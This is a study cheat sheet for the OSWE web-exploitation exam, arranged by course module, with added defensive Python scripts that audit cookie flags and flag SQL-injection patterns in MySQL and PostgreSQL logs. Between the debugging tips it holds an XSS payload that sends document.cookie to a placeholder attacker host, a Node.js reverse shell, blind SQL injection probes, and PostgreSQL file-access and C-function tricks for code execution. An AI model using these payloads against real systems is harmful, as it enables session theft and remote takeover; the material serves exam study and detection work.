OSWE-cheat sheet module by module with updated syllabus


rinku191/OSWE-cheat-sheet


OSWE-cheat-sheet

OSWE cheat sheet: module-by-module short notes for quick exam revision:

Module : Atmail (PHP):

  1. Access the cookie and display it in an alert (works only when the HttpOnly flag is absent from the Set-Cookie header)

    <script>alert(document.cookie);</script>
  2. Run a simple HTTP server with Python 3
    python3 -m http.server

  3. Embed the cookie-stealing payload in an image tag (the cookie travels in the requested URL)
    function addImage() {
        var img = document.createElement('img');
        img.src = 'http://AttackerIP:port/' + document.cookie;
        document.body.appendChild(img);
    }
    addImage();

  4. Set a cookie from the web developer console
    javascript:void(document.cookie="cookiename=value");

  5. XHR POST request
    var xhr = new XMLHttpRequest();
    xhr.open("POST", url, true);
    xhr.send(data);

  6. XHR GET request
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.send();
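Item 1 of this module only works because the session cookie is issued without HttpOnly. The check below is an added example, not code from the rinku191/OSWE-cheat-sheet repository or from Atmail: it parses Set-Cookie header values and reports which protective attributes (HttpOnly, Secure, SameSite) are missing. The three header values and the cookie names in SAMPLE_HEADERS are constructed samples.

```python
import re

# Constructed Set-Cookie header values for demonstration (not captured traffic).
SAMPLE_HEADERS = [
    "atmail6=abc123; path=/",
    "session=def456; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/; Secure",
]


def parse_set_cookie(header):
    """Split one Set-Cookie value into (cookie name, attribute dict).

    Attribute names are lower-cased so 'HttpOnly' and 'httponly' compare equal;
    flag attributes without a value map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, value = part.split("=", 1)
            attrs[key.strip().lower()] = value.strip()
        else:
            attrs[part.lower()] = True
    return name, attrs


def audit_cookie(header):
    """Return (name, list of missing protections) for one Set-Cookie header."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable through document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plain HTTP")
    if "samesite" not in attrs:
        findings.append("missing SameSite: attached to cross-site requests")
    return name, findings


def audit_all(headers):
    """Map each cookie name to its list of findings (empty list = fully flagged)."""
    return {name: findings for name, findings in (audit_cookie(h) for h in headers)}


if __name__ == "__main__":
    for cookie, findings in audit_all(SAMPLE_HEADERS).items():
        print(cookie, "->", findings or "ok")
```

Run it against the Set-Cookie lines of a real response (for example copied from the browser's network tab) to see at a glance whether the item 1 payload would have anything to read.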

Module : ATutor Authentication Bypass and RCE (PHP) :

  1. Enable MySQL query logging
    nano /etc/mysql/my.cnf   // uncomment or add the lines below
    [mysqld]
    general_log_file = /var/log/mysql/mysql.log
    general_log = 1
    systemctl restart mysql   // restart MySQL
    tail -f /var/log/mysql/mysql.log   // follow the MySQL log

  2. Enable verbose PHP errors
    nano /etc/php5/apache2/php.ini   // uncomment or add the line below
    display_errors = On
    systemctl restart apache2   // restart Apache

  3. Print a message in PHP
    echo "any message";

  4. Dump information about a variable
    var_dump($var);

  5. Search for a function definition in the code
    grep -rnw "function name(" ./ --color

  6. Check whether magic quotes are enabled
    var_dump(get_magic_quotes_gpc()); /** returns 1 when enabled **/

  7. MySQL query without spaces (an inline comment works as the separator)
    mysql> select/**/1;

  8. Extract the first character of the MySQL version in a blind (boolean) query
    mysql> select ascii(substring((select version()),1,1))=53; /** 53 is ASCII '5'; use it as the condition of an "or" boolean test **/

  9. Create a ZIP file using Python 2
    #!/usr/bin/python
    import zipfile
    from cStringIO import StringIO

    def build_zip():
        f = StringIO()                                    # in-memory buffer for the archive
        z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
        z.writestr('folder/file.txt', 'secret')           # entry path inside the archive and its content
        z.close()
        zip = open('zip.zip', 'wb')
        print f.getvalue()                                # dump the raw archive bytes to stdout
        zip.write(f.getvalue())                           # write the archive to disk
        zip.close()

    build_zip()
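Items 1, 7 and 8 of this module fit together on the defensive side: once the general log is on, the comment-as-whitespace trick and the ascii(substring(version())) probe are visible in it. The script below is an added example, not code from the rinku191/OSWE-cheat-sheet repository or from ATutor: it parses general_log lines in the MySQL 5.7+ format and flags queries carrying those indicators. The log lines in SAMPLE_LOG are constructed; the timestamps, thread id, database and table names are made up.

```python
import re

# Constructed MySQL general_log lines (5.7+ format: time, thread id, command, argument).
SAMPLE_LOG = [
    "2024-05-01T09:12:01.000000Z\t   41 Connect\tatutor@localhost on atutor",
    "2024-05-01T09:12:01.100000Z\t   41 Query\tSELECT * FROM members WHERE login='alice'",
    "2024-05-01T09:12:02.000000Z\t   41 Query\tselect/**/1",
    "2024-05-01T09:12:03.000000Z\t   41 Query\tSELECT 1 FROM members WHERE login='x' or ascii(substring((select version()),1,1))=53",
    "2024-05-01T09:12:04.000000Z\t   41 Quit\t",
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>Query|Connect|Quit|Init DB)\t?(?P<arg>.*)$")

# MySQL treats /*...*/ as whitespace, which is why 'select/**/1' is valid.
COMMENT_RE = re.compile(r"/\*.*?\*/")

# Indicators checked on the normalised (comment-free, lower-cased) statement.
INDICATORS = {
    "blind_char_inference": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\("),
    "version_probe": re.compile(r"\bversion\s*\(\s*\)"),
}


def normalize(sql):
    """Replace inline comments with a space, collapse whitespace, lower-case."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", sql)).strip().lower()


def classify(sql):
    """Return the list of indicator names that match one SQL statement."""
    hits = []
    if COMMENT_RE.search(sql):
        hits.append("comment_as_whitespace")
    norm = normalize(sql)
    for name, rx in INDICATORS.items():
        if rx.search(norm):
            hits.append(name)
    return hits


def scan_general_log(lines):
    """Parse general_log lines and return the flagged Query entries."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        hits = classify(m.group("arg"))
        if hits:
            flagged.append({"tid": m.group("tid"), "indicators": hits, "sql": m.group("arg")})
    return flagged


if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_LOG):
        print(hit["tid"], hit["indicators"], hit["sql"])
```

The normalisation step matters more than the regexes: without stripping the comments first, a pattern written for "select 1" would miss "select/**/1", which is exactly the gap item 7 relies on.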

Module : PHP Type Juggling Vulnerability :

  1. Start a debugging SMTP server
    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25 & /* the trailing & runs it in the background; the smtpd module was removed in Python 3.12 */

Module : ManageEngine Application Manager AMUserResourcesSyncServlet SQL (PostgreSQL) Injection & RCE :

  1. web.xml determines how URLs are mapped to servlets
  2. Use the JD-GUI tool to decompile Java classes
  3. Find SQL injection candidates with the regular expression below
    ^.?query.?select.*?
  4. Enable PostgreSQL statement logging by uncommenting the line below in postgresql.conf
    log_statement = 'all'
  5. PostgreSQL CLI: psql -U username -p 15432 /* -p = port */
  6. Dollar quoting ($$) is an alternative to the single quote (')
  7. Decode a string in PostgreSQL
    select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
  8. Build a string using CHR and string concatenation
    SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
  9. Accessing the file system in PostgreSQL
    COPY <table_name> FROM <file_name>
    COPY <table_name> TO <file_name>
  10. PostgreSQL extensions (a user-defined function backed by a shared library)
    CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;
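Items 6 to 10 are the PostgreSQL side of the same story, and with log_statement = 'all' (item 4) every one of them lands in the server log. The helper below is an added example, not code from the rinku191/OSWE-cheat-sheet repository or from ManageEngine: it pulls statements out of PostgreSQL log lines, folds CHR()||CHR() chains, convert_from(decode(..., 'base64')) calls and $$...$$ quoting back into plain 'string' literals so the original text is readable, and flags COPY-to-file statements and LANGUAGE 'C' function definitions. The log lines in SAMPLE_LOG are constructed; the timestamps, pids and the users table are made up.

```python
import base64
import re

# Constructed PostgreSQL log lines as written with log_statement = 'all'.
SAMPLE_LOG = [
    "2024-05-01 09:12:03.001 UTC [2201] LOG:  statement: SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);",
    "2024-05-01 09:12:03.002 UTC [2201] LOG:  statement: select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');",
    "2024-05-01 09:12:03.003 UTC [2201] LOG:  statement: SELECT * FROM users WHERE name = $$admin$$;",
    "2024-05-01 09:12:03.004 UTC [2201] LOG:  statement: SELECT id FROM users WHERE name = 'admin';",
]

STMT_RE = re.compile(r"\[(?P<pid>\d+)\] LOG:\s+statement:\s+(?P<sql>.*)$")

# One CHR(n) call, and a chain of CHR(n) calls joined with ||.
CHR_RE = re.compile(r"\bchr\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
CHR_CHAIN_RE = re.compile(
    r"\bchr\s*\(\s*\d+\s*\)(?:\s*\|\|\s*chr\s*\(\s*\d+\s*\))*", re.IGNORECASE)
# convert_from(decode('<base64>', 'base64'), '<encoding>')
DECODE_RE = re.compile(
    r"convert_from\s*\(\s*decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*,\s*'base64'\s*\)"
    r"\s*,\s*'[^']*'\s*\)", re.IGNORECASE)
# Plain $$...$$ dollar quoting (tagged $tag$...$tag$ quoting is not handled).
DOLLAR_RE = re.compile(r"\$\$(.*?)\$\$", re.DOTALL)

# Flags are evaluated on the raw statement, before any rewriting.
FLAGS = {
    "chr_concat": CHR_CHAIN_RE,
    "base64_decode": DECODE_RE,
    "dollar_quote": DOLLAR_RE,
    "file_access": re.compile(r"\bcopy\b.*\b(?:from|to)\b\s*'", re.IGNORECASE | re.DOTALL),
    "c_language_function": re.compile(r"\blanguage\s+'?c'?\b", re.IGNORECASE),
}


def fold_chr_chain(m):
    """Turn CHR(65) || CHR(87) ... into the single-quoted literal it builds."""
    return "'" + "".join(chr(int(n)) for n in CHR_RE.findall(m.group(0))) + "'"


def fold_base64(m):
    """Turn convert_from(decode('...', 'base64'), enc) into its decoded literal."""
    return "'" + base64.b64decode(m.group(1)).decode("utf-8", "replace") + "'"


def deobfuscate(sql):
    """Rewrite the three literal-hiding constructs into plain 'string' literals.

    Good enough for triage: a single quote inside a $$...$$ body is not escaped.
    """
    sql = CHR_CHAIN_RE.sub(fold_chr_chain, sql)
    sql = DECODE_RE.sub(fold_base64, sql)
    sql = DOLLAR_RE.sub(lambda m: "'" + m.group(1) + "'", sql)
    return sql


def triage_log(lines):
    """Return one record per logged statement: pid, flags, raw and decoded SQL."""
    records = []
    for line in lines:
        m = STMT_RE.search(line)
        if not m:
            continue
        sql = m.group("sql")
        flags = [name for name, rx in FLAGS.items() if rx.search(sql)]
        records.append({"pid": m.group("pid"), "flags": flags,
                        "sql": sql, "decoded": deobfuscate(sql)})
    return records


if __name__ == "__main__":
    for rec in triage_log(SAMPLE_LOG):
        print(rec["pid"], rec["flags"], rec["decoded"])
```

Both the CHR chain and the base64 form in the sample decode to the same literal, which is the point of items 7 and 8: the obfuscation changes the bytes on the wire but not the statement the server executes, so the log, not the request, is the place to look.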

Module : The Bassmaster Plugin (Nodejs) :

  1. JavaScript (Node.js) reverse shell
    var net = require("net"), sh = require("child_process").exec("/bin/bash");
    var client = new net.Socket();
    client.connect(53, "attackerip", function() {
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });

Module : DotNetNuke Cookie Deserialization RCE

  1. XmlSerializer Limitations
    XmlSerializer is only able to serialize public properties and fields of an object.
  2. For a better debugging experience, modify the debuggable attribute of the DLL in dnSpy
    [assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
  3. XML serialization & deserialization methods
    XmlSerializer.Serialize() and XmlSerializer.Deserialize(reader)
  4. Java serialization & deserialization methods
    Deserialization: ObjectInputStream.readObject() and serialization: ObjectOutputStream.writeObject()

Module : ERPNext Authentication Bypass and Server Side Template Injection :

  1. Run an SMTP server on Kali
    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25
